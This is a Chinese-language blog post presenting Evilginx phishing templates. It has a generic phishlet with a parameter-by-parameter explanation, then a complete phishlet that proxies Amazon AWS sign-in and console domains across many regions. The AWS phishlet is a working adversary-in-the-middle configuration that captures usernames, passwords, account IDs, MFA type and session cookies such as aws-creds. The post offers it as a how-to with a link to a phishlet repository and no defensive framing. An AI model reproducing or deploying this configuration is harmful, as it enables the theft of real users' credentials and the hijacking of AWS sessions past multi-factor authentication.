阳子
阳子
Published on 2024-06-07 / 125 Visits
0
0

Evilginx 钓鱼页面模板

name: '您的第一个钓鱼页面'
author: 'Simpler Hacking'
min_ver: '3.2.0'

proxy_hosts:
  - { phish_sub: 'www', orig_sub: 'www', domain: '{domain}', session: true, is_landing: true }

sub_filters: 
  - { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['text/html', 'application/javascript', 'text/css', 'application/json', 'image/x-icon', 'text/plain', 'application/xml', 'image/*', 'font/*']} 
  - { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['application/x-www-form-urlencoded']}

auth_tokens:
  - domain: '{domain}'
    keys: ['session']

creds:
  - key: '用户名'
    search: ['(.*)']
    type: 'post'
  - key: '密码'
    search: ['(.*)']
    type: 'post'

auth_urls:
  - url_regex: 'https://{hostname}/login'
    valid_statuses: [200]

login:
  username: 用户
  password: 密码
  url: https://www.{domain}/login

# 这是 3.2.0 版本的一个示例钓鱼页面

# 您可以在以下位置找到钓鱼页面:https://github.com/simplerhacking/Evilginx3-Phishlets

钓鱼页面参数说明

  • name: 定义钓鱼页面的名称。

  • author: 填写钓鱼页面的作者。

  • min_ver: 指定兼容该钓鱼页面的最小 Evilginx 版本。

  • proxy_hosts: 表示需要代理的域名和子域。phish_sub 是被模仿的钓鱼页面的子域。

  • sub_filters: 让钓鱼页面替换实际域名实例为钓鱼域名,这对钓鱼页面正常工作至关重要。

  • auth_tokens: 标识应从受害者浏览器捕获的饼干,以便获取访问受害者的会话权限。

  • creds: 此字段确定设计用来窃取的凭证。key 是凭证的名称(如用户名或密码),search 是正则表达式,程序会使用它来识别并从用户输入中提取这些详细信息。

  • auth_urls: 规定了 Evilginx 将视为已认证 URL 的网址。在受害者登录后,如果检测到重定向到这些 URL 之一,那么将窃取列出的 auth_tokens

  • login: 在这里指定目标网页登录表单中的用户名和密码字段标识符,以及受害者输入凭据的页面链接。

  • force_post: 若设置为真,则强制将 HTTP 方法从 GET 更改为 POST。

  • is_landing: 如果设置为真,表示该页面是钓鱼攻击的着陆页。

  • js_inject: 可以在这里编写一些 JavaScript 代码注入网页中,通常用于增强钓鱼攻击,确保受害者体验顺畅。

  • domain: 用作模板变量,替换钓鱼配置中使用的目标主机名。

Evilginx3 模板

钓鱼页面仓库:https://github.com/simplerhacking/Evilginx3-Phishlets

name: 'Amazon'
min_ver: '3.0.0'

params:
  - {name: 'accountid', default: '', required: false}

proxy_hosts:
  - {phish_sub: 'signin.aws', orig_sub: 'signin.aws', domain: 'amazon.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'aws', orig_sub: 'aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: '', orig_sub: '', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'phd.aws', orig_sub: 'phd.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'console.aws', orig_sub: 'console.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'a.b.cdn.console', orig_sub: 'a.b.cdn.console', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true}

# subdomains updated (based on configuration)
  - {phish_sub: 'us-east-1.console.aws', orig_sub: 'us-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'us-east-2.console.aws', orig_sub: 'us-east-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}  
  - {phish_sub: 'us-west-1.console.aws', orig_sub: 'us-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}  
  - {phish_sub: 'us-west-2.console.aws', orig_sub: 'us-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'af-south-1.console.aws', orig_sub: 'af-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'ap-east-1.console.aws', orig_sub: 'ap-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'ap-south-1.console.aws', orig_sub: 'ap-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'ap-northeast-3.console.aws', orig_sub: 'ap-northeast-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'ap-northeast-2.console.aws', orig_sub: 'ap-northeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'ap-southeast-1.console.aws', orig_sub: 'ap-southeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'ap-southeast-2.console.aws', orig_sub: 'ap-southeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'ap-northeast-1.console.aws', orig_sub: 'ap-northeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'ca-central-1.console.aws', orig_sub: 'ca-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'eu-central-1.console.aws', orig_sub: 'eu-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'eu-west-1.console.aws', orig_sub: 'eu-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'eu-west-2.console.aws', orig_sub: 'eu-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'eu-south-1.console.aws', orig_sub: 'eu-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'eu-west-3.console.aws', orig_sub: 'eu-west-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'eu-north-1.console.aws', orig_sub: 'eu-north-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'me-south-1.console.aws', orig_sub: 'me-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'sa-east-1.console.aws', orig_sub: 'sa-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}

auth_tokens:
  - domain: '.amazon.com'
    keys: ['aws-ubid-main', 'aws-signer-token_ap-southeast-2', 'noflush_awsccs_sid', 'aws-userInfo', 'aws-userInfo-signed', 'aws-account-alias', '.*,regexp']
  - domain: '.aws.amazon.com'
    keys: ['awsccc', 'aws-vid', 'aws-account-data', '.*,regexp']
  - domain: '.console.aws.amazon.com'
    keys: ['noflush_Region', 'noflush_awscnm', 'awsc-rac', 'aws-creds', 'aws-consoleInfo', 'aws-creds-code-verifier', 'seance', '.*,regexp']
  - domain: '.signin.aws.amazon.com'
    keys: ['aws-creds', 'aws-userInfo-keyBase', 'aws-mfa-entered', 'JSESSIONID', 'aws-signin-csrf', '.*,regexp']
  - domain: 'phd.aws.amazon.com'
    keys: ['aws-creds', 'aws-creds-code-verifier', 'aws-consoleInfo', 'seance', '.*,regexp']

credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
  custom:
    - key: 'account'
      search: '(.*)'
      type: 'post'
    - key: 'mfaType'
      search: '(.*)'
      type: 'post'

auth_urls:
  - '/console/home'

login:
  domain: 'signin.aws.amazon.com'
  path: '/oauth?redirect_uri=https://console.aws.amazon.com/console/home?hashArgs=%23&isauthcode=true&client_id=arn:aws:signin:::console/canvas&response_type=code&iam_user=true{accountid}&forceMobileApp=0&code_challenge=hzU4QD5OTEZeurPpybAoADh8GnO_URqBECTzHN4CxkY&code_challenge=&code_challenge_method=SHA-256'

演示


Comment